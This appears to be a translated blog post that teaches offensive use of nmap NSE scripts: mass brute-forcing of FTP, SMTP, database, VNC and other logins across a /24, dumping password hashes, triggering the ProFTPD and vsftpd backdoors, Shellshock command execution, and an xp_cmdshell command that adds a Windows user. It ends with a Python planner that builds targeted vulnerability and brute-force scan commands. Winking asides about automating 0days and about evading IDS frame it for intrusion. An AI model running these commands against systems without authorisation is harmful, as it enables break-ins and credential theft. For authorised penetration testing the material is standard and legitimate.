Advanced nmap usage [script edition]



0x01 Foreword

Today's focus is not nmap itself. The aim is to walk through the nmap scripts (NSE) that are actually useful against real targets, so the ordinary nmap options are not explained again here; see the earlier article on port-level penetration for those. Without further ado: start with the statement below to get a rough idea of which services the target host, or the target's C class, is running, and only then go after specific ones:

# nmap -sV -sT -Pn --open -v 192.168.3.23

Of course, you can also pull each service's banner for more detail first. Some vulnerabilities in a service only affect one specific version, so knowing the version in advance is well worth it (the banner script has to be loaded with --script):

# nmap -sT -Pn --open -v --script banner 192.168.3.23

 

0x02 Scripts for detecting some FTP-related vulnerabilities:

ftp-anon.nse: checks whether the target FTP server allows anonymous login. Beyond the login itself, it also reports which directories are readable and writable, which is handy for harvesting hosts in bulk.
# nmap -p 21 --script ftp-anon.nse -v 192.168.3.23

ftp-brute.nse: FTP brute force. It only tries a set of simple weak passwords and can take a while (slower still over a VPN), since this is a direct brute force against a public-facing host.
# nmap -p 21 --script ftp-brute.nse -v 192.168.3.23

ftp-vuln-cve2010-4221.nse: ProFTPD before 1.3.3c has multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c.
# nmap -p 21 --script ftp-vuln-cve2010-4221.nse -v 192.168.3.23

ftp-proftpd-backdoor.nse: the ProFTPD 1.3.3c release tarball (ProFTPD-1.3.3c.tar.bz2) was trojaned with a backdoor. By default the script only runs the id command; the command can be changed with the ftp-proftpd-backdoor.cmd script argument, or the script itself edited to spawn a shell directly.
# nmap -p 21 --script ftp-proftpd-backdoor.nse -v 192.168.3.23

ftp-vsftpd-backdoor.nse: vsftpd 2.3.4 had the same problem as ProFTPD, a backdoor inserted into the release.
# nmap -p 21 --script ftp-vsftpd-backdoor.nse -v 192.168.3.23

0x03 Scripts related to scanning SSH:

sshv1.nse: checks whether the target SSH server still supports protocol version 1, which is open to man-in-the-middle attacks.
# nmap -p 22 --script sshv1.nse -v 192.168.3.23

 

0x04 Scripts related to scanning SMTP:

smtp-brute.nse: simple SMTP authentication brute force.
# nmap -p 25 --script smtp-brute.nse -v 192.168.3.23

smtp-enum-users.nse: enumerates user names on the target mail server (via VRFY, EXPN and RCPT TO). This only works if the target is misconfigured to allow it.
# nmap -p 25 --script smtp-enum-users.nse -v 192.168.3.23

smtp-vuln-cve2010-4344.nse: Exim before 4.70 has a heap overflow in the string_vformat function in string.c.
# nmap -p 25 --script smtp-vuln-cve2010-4344.nse -v 192.168.3.23

smtp-vuln-cve2011-1720.nse: Postfix before 2.5.13, 2.6.x before 2.6.10, 2.7.x before 2.7.4 and 2.8.x before 2.8.3 have a memory corruption bug in the Cyrus SASL authentication handling.
# nmap -p 25 --script smtp-vuln-cve2011-1720.nse -v 192.168.3.23

smtp-vuln-cve2011-1764.nse: Exim format string vulnerability in dkim_exim_verify_finish(). Too old to be encountered much anymore.
# nmap -p 25 --script smtp-vuln-cve2011-1764.nse -v 192.168.3.23

0x05 Scripts related to scanning POP3:

pop3-brute.nse: simple POP3 weak-password brute force.
# nmap -p 110 --script pop3-brute.nse -v 192.168.3.23

 

0x06 Scripts related to scanning IMAP:

imap-brute.nse: simple IMAP weak-password brute force.
# nmap -p 143,993 --script imap-brute.nse -v 192.168.3.23

 

0x07 Vulnerability scanning scripts related to DNS:

dns-zone-transfer.nse: checks whether the target name server allows zone transfers (AXFR). Pass the zone name explicitly; otherwise the script derives it from the target name given on the command line or from the server's hostname.
# nmap -p 53 --script dns-zone-transfer.nse -v 192.168.3.23
# nmap -p 53 --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=target.org -v 192.168.3.23

hostmap-ip2hosts.nse: a small script for finding the other sites hosted on the same IP, using the ip2hosts API. That API seems to have been shut down; if you want to keep using the script, strip the API-dependent part out of it.
# nmap -p80 --script hostmap-ip2hosts.nse 192.168.3.23

0x08 Scanning scripts for the various databases:

informix-brute.nse: Informix brute force.
# nmap -p 9088 --script informix-brute.nse 192.168.3.23

mysql-empty-password.nse: checks MySQL for a root account with an empty password.
# nmap -p 3306 --script mysql-empty-password.nse -v 192.168.3.23

mysql-brute.nse: simple MySQL root weak-password brute force.
# nmap -p 3306 --script mysql-brute.nse -v 192.168.3.23

mysql-dump-hashes.nse: dumps the password hashes of all MySQL users (needs valid credentials).
# nmap -p 3306 --script mysql-dump-hashes --script-args='username=root,password=root' 192.168.3.23

mysql-vuln-cve2012-2122.nse: the MySQL/MariaDB authentication bypass (MariaDB and MySQL 5.1.61, 5.2.11, 5.3.5, 5.5.22 and earlier). The exploitation conditions are rather strict: the bug only triggers with certain memcmp() implementations, so targets whose MySQL was compiled from source have a comparatively higher success rate.
# nmap -p 3306 --script mysql-vuln-cve2012-2122.nse -v 192.168.3.23

ms-sql-info.nse: scan a C class for MSSQL, either through SMB (port 445) or directly on the instance port.
# nmap -p 445 --script ms-sql-info.nse -v 192.168.3.0/24
# nmap -p 1433 --script ms-sql-info.nse --script-args mssql.instance-port=1433 -v 192.168.3.0/24

ms-sql-empty-password.nse: checks MSSQL for an sa account with an empty password.
# nmap -p 1433 --script ms-sql-empty-password.nse -v 192.168.3.0/24

ms-sql-brute.nse: sa weak-password brute force.
# nmap -p 1433 --script ms-sql-brute.nse -v 192.168.3.0/24

ms-sql-xp-cmdshell.nse: executes a system command remotely via xp_cmdshell.
# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user test test /add" 192.168.3.0/24

ms-sql-dump-hashes.nse: dumps all MSSQL database logins and their password hashes. It needs credentials, either passed as mssql.username/mssql.password or found by ms-sql-brute / ms-sql-empty-password in the same run.
# nmap -p 1433 --script ms-sql-dump-hashes -v 192.168.3.0/24

pgsql-brute.nse: PostgreSQL brute force.
# nmap -p 5432 --script pgsql-brute -v 192.168.3.0/24

oracle-brute-stealth.nse: Oracle brute force that abuses a weakness in the O5LOGON handshake (Oracle 11g): it collects the session key and salt and disconnects before the attempt is recorded as a failed login, so the password can be cracked offline.
# nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL -v 192.168.3.0/24

oracle-brute.nse: ordinary Oracle brute force (the SID is required; use oracle-sid-brute first if it is unknown).
# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL -v 192.168.3.0/24

mongodb-brute.nse: MongoDB brute force.
# nmap -p 27017 --script mongodb-brute 192.168.3.0/24

redis-brute.nse: Redis brute force.
# nmap -p 6379 --script redis-brute.nse 192.168.3.0/24

0x09 Scripts related to SNMP:

snmp-brute.nse: brute-forces SNMP community strings across a C class (SNMP is UDP, so use -sU and port 161).
# nmap -sU -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=user.txt 192.168.3.0/24

 

0x10 Scripts related to telnet:

telnet-brute.nse: simple telnet brute force.
# nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s -v 192.168.3.0/24

 

0x11 Exploitation scripts related to LDAP:

ldap-brute.nse: simple LDAP brute force.
# nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' 192.168.3.0/24

 

0x12 Scripts for the various web middlewares and integrated web environments:

xmpp-brute.nse: XMPP brute force.
# nmap -p 5222 --script xmpp-brute.nse 192.168.3.0/24

http-iis-short-name-brute.nse: IIS short (8.3) filename enumeration.
# nmap -p80 --script http-iis-short-name-brute.nse 192.168.3.0/24

http-iis-webdav-vuln.nse: IIS 5.1/6.0 WebDAV authentication bypass, which lets you write into protected folders.
# nmap --script http-iis-webdav-vuln.nse -p 80,8080 192.168.3.0/24

http-shellshock.nse: Shellshock, remote command execution through bash via CGI.
# nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.3.0/24

http-svn-info.nse: fingerprints the target's SVN repository.
# nmap --script http-svn-info 192.168.3.0/24

http-drupal-enum.nse: for open-source applications like this there is really no need to use nmap; once you have seen enough of them, you recognise them at a glance.
http-wordpress-brute.nse: WordPress login brute force.
# nmap -p80 -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com,http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.3.0/24

http-backup-finder.nse: looks for backup copies of the target site's files.
# nmap -p80 --script=http-backup-finder 192.168.3.0/24

http-vuln-cve2015-1635.nse: MS15-034, remote code execution in HTTP.sys (IIS on Windows 7, 8, Server 2008 R2 and 2012); this is not an IIS 6.0 bug. If you prefer the wildcard form to run every http-vuln-cve* script, quote it so the shell does not expand it.
# nmap -sV --script http-vuln-cve2015-1635 --script-args uri='/anotheruri/' 192.168.3.0/24

0x13 Scripts related to VPNs. So far only the PPTP one seems to work:

pptp-version.nse: identifies the target's PPTP version.
# nmap -p 1723 --script pptp-version.nse 192.168.3.0/24

 

0x14 SMB vulnerability detection scripts:

smb-vuln-ms08-067.nse (Server service / NetAPI)
smb-vuln-ms10-054.nse (SMB server memory corruption)
smb-vuln-ms10-061.nse (Print Spooler)
smb-vuln-ms17-010.nse (SMBv1, EternalBlue remote code execution)
# nmap -p445 --script smb-vuln-ms17-010.nse 192.168.3.0/24

 

0x15 Detecting sniffers on the internal network. In actual testing it did not seem to be of any use; perhaps my experiment was wrong :(

sniffer-detect.nse (it works by sending crafted ARP/Ethernet frames, so it only applies to hosts on the same Ethernet segment as the scanner)
# nmap -sn -Pn --script sniffer-detect.nse 192.168.3.0/24

 

0x16 Other auxiliary scripts:

rsync-brute.nse: brute-forces the target's rsync (a module name is required).
# nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.3.0/24

rlogin-brute.nse: brute-forces the target's rlogin.
# nmap -p 513 --script rlogin-brute 192.168.3.0/24

vnc-brute.nse: brute-forces the target's VNC.
# nmap --script vnc-brute -p 5900 192.168.3.0/24

pcanywhere-brute.nse: pcAnywhere brute force.
# nmap -p 5631 --script=pcanywhere-brute 192.168.3.0/24

nessus-brute.nse: Nessus brute force. Nessus apparently no longer listens on 1241, so this one is far too old; just ignore it.
# nmap --script nessus-brute -p 1241 192.168.3.0/24

nexpose-brute.nse: Nexpose brute force.
# nmap --script nexpose-brute -p 3780 192.168.3.0/24

shodan-api.nse: scans via the Shodan API instead of probing the target directly. If you hold a 0day yourself, its power is not to be underestimated.
# nmap --script shodan-api --script-args 'shodan-api.target=192.168.3.0/24,shodan-api.apikey=SHODANAPIKEY'

0x17 Trying a one-liner nmap routine vulnerability scan of a target C class

In practice this is very slow: validating even a single script can take a long time, and it gets slower still when your VPS has little bandwidth and the network is poor. So the advice is to take a quick look at the target's services first and then scan each one individually; the real success rate is likely much higher that way. After all, this is not a stateless scanner like masscan or zmap:

# nmap -sT -Pn -v --script dns-zone-transfer.nse,ftp-anon.nse,ftp-proftpd-backdoor.nse,ftp-vsftpd-backdoor.nse,ftp-vuln-cve2010-4221.nse,http-backup-finder.nse,http-cisco-anyconnect.nse,http-iis-short-name-brute.nse,http-put.nse,http-php-version.nse,http-shellshock.nse,http-robots.txt.nse,http-svn-enum.nse,http-webdav-scan.nse,iis-buffer-overflow.nse,iax2-version.nse,memcached-info.nse,mongodb-info.nse,msrpc-enum.nse,ms-sql-info.nse,mysql-info.nse,nrpe-enum.nse,pptp-version.nse,redis-info.nse,rpcinfo.nse,samba-vuln-cve-2012-1182.nse,smb-vuln-ms08-067.nse,smb-vuln-ms17-010.nse,snmp-info.nse,sshv1.nse,xmpp-info.nse,tftp-enum.nse,teamspeak2-version.nse 192.168.3.0/24

Trying a one-liner nmap weak-password brute force across a target C class. The same problem applies: if validating one vulnerability takes that long, finishing a weak-password dictionary is out of the question. nmap's default password list holds around 5000 entries, which means roughly 5000 attempts per user name; with a little less bandwidth on the VPS there is no telling how long that takes. We are on the public Internet, not an intranet, so it is best not to load many brute-force scripts at once. If you really must brute force, spend some extra time collecting valuable user names for the target to raise your hit rate as far as possible:

# nmap -sT -v -Pn --script ftp-brute.nse,imap-brute.nse,smtp-brute.nse,pop3-brute.nse,mongodb-brute.nse,redis-brute.nse,ms-sql-brute.nse,rlogin-brute.nse,rsync-brute.nse,mysql-brute.nse,pgsql-brute.nse,oracle-sid-brute.nse,oracle-brute.nse,rtsp-url-brute.nse,snmp-brute.nse,svn-brute.nse,telnet-brute.nse,vnc-brute.nse,xmpp-brute.nse 192.168.3.0/24
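The workflow that the foreword and this section both recommend (one broad -sV pass, then targeted per-service scripts, with brute forcing budgeted on its own) can be scripted instead of done by hand. The following is an added Python example, not code from the original article: it parses the XML that `nmap -sV -oX -` writes (a constructed sample is embedded), maps each open service to the scripts discussed on this page, and emits one targeted nmap line per host plus a separate brute-force plan with a time estimate. The service-to-script table, the 5000-entry dictionary size and the guess rate are assumptions for this example.

```python
"""Turn a first-pass `nmap -sV -oX` result into targeted per-service NSE runs.

Added example, not the article's own code. The script tables are an
assumption for this example: scripts discussed on the page, keyed by the
service name nmap reports, with brute-force scripts kept apart from the
cheap single-probe checks so they can be budgeted separately.
"""
import xml.etree.ElementTree as ET

# Cheap checks: safe to batch into one nmap run per host.
VULN_SCRIPTS = {
    "ftp": ["ftp-anon", "ftp-proftpd-backdoor", "ftp-vsftpd-backdoor", "ftp-vuln-cve2010-4221"],
    "ssh": ["sshv1"],
    "smtp": ["smtp-enum-users", "smtp-vuln-cve2010-4344", "smtp-vuln-cve2011-1720"],
    "domain": ["dns-zone-transfer"],
    "http": ["http-backup-finder", "http-iis-short-name-brute", "http-shellshock", "http-svn-info"],
    "mysql": ["mysql-empty-password", "mysql-vuln-cve2012-2122"],
    "ms-sql-s": ["ms-sql-info", "ms-sql-empty-password"],
    "microsoft-ds": ["smb-vuln-ms08-067", "smb-vuln-ms17-010"],
    "pptp": ["pptp-version"],
}
# Password guessing: one script per run, only with a curated user list.
BRUTE_SCRIPTS = {
    "ftp": "ftp-brute", "smtp": "smtp-brute", "pop3": "pop3-brute", "imap": "imap-brute",
    "mysql": "mysql-brute", "ms-sql-s": "ms-sql-brute", "postgresql": "pgsql-brute",
    "telnet": "telnet-brute", "vnc": "vnc-brute",
}

# Constructed sample of `nmap -sV -oX -` output, trimmed to the elements used here.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="192.168.3.23" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd" version="2.3.4"/></port>
    <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
    <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
    <port protocol="tcp" portid="443"><state state="closed"/><service name="https"/></port>
    <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/></port>
  </ports></host>
  <host><status state="up"/><address addr="192.168.3.24" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    <port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s"/></port>
  </ports></host>
</nmaprun>"""


def open_services(xml_text):
    """Return {ip: [(port, service), ...]} for every open TCP port in nmap XML output."""
    hosts = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        found = []
        for port in host.iter("port"):
            state = port.find("state")
            if port.get("protocol") != "tcp" or state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            found.append((int(port.get("portid")), svc.get("name") if svc is not None else "unknown"))
        if found:
            hosts[addr.get("addr")] = found
    return hosts


def plan_vuln_scan(hosts):
    """One nmap line per host with the cheap checks for its services, limited to those ports."""
    plan = {}
    for ip, services in hosts.items():
        ports, scripts = [], []
        for port, name in services:
            if name not in VULN_SCRIPTS:
                continue  # nothing on this page covers that service
            ports.append(str(port))
            scripts.extend(s for s in VULN_SCRIPTS[name] if s not in scripts)
        if scripts:
            plan[ip] = f"nmap -sT -Pn -v -p {','.join(ports)} --script {','.join(scripts)} {ip}"
    return plan


def plan_brute_scan(hosts, userdb, passdb, n_users, n_passwords=5000, guesses_per_sec=5.0):
    """One nmap line per brute-force script and host, with a rough time budget in seconds.

    n_passwords defaults to the ~5000 entries in nmap's default password list;
    guesses_per_sec is an assumed rate for a remote target (measure it first).
    """
    plan = []
    for ip, services in hosts.items():
        for port, name in services:
            script = BRUTE_SCRIPTS.get(name)
            if script is None:
                continue
            cmd = (f"nmap -sT -Pn -v -p {port} --script {script} "
                   f"--script-args userdb={userdb},passdb={passdb},brute.firstonly=true {ip}")
            plan.append((cmd, n_users * n_passwords / guesses_per_sec))
    return plan


if __name__ == "__main__":
    hosts = open_services(SAMPLE_XML)
    for cmd in plan_vuln_scan(hosts).values():
        print(cmd)
    for cmd, secs in plan_brute_scan(hosts, "users.txt", "pwds.txt", n_users=3):
        print(f"{cmd}   # ~{secs / 3600:.1f} h")
```

Feed it a real scan with `nmap -sV -sT -Pn --open -oX scan.xml 192.168.3.0/24` and `open_services(open("scan.xml").read())`. Services with no entry in the tables are skipped rather than probed blindly, and each brute-force command is emitted on its own so you can decide per service whether the estimated time is worth it.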

 



Afterword:
    Because nmap ships with such a rich set of vulnerability-scanning scripts, its capabilities have been greatly extended. It means we can follow the syntax nmap defines and write our own simple custom scans, which is the thing I think nmap does really well: enormous extensibility. For instance, when you hold a 0day and want to automate something with it, heh... I will not go into detail, I am sure everyone understands ^_^ [just hope you do not land in somebody's honeypot, or the Nday would be a pity].
    Yes, stateless scanners like masscan and zmap are frighteningly fast, and the Shodan API is a good option too, but their support for custom scripts still falls short. For lack of time I only picked scripts that may actually get used; that is all for today. Tools are neither good nor bad, and not all of this will be usable in practice; what matters is adapting flexibly during a real penetration test.
    That said, all of this assumes the other side lets you scan at all: nmap's signature is far too conspicuous, and the handful of scan types nmap supports have presumably long been immunised against by all sorts of IDS. Frankly, some targets may never give you a chance to scan. Other nmap usage will be added from time to time as I run into anything fairly practical. If you are interested, you can also go straight to the official documentation, which is very detailed, far more than this. Any questions, message me directly.

 

Origin www.cnblogs.com/kuaile1314/p/11260344.html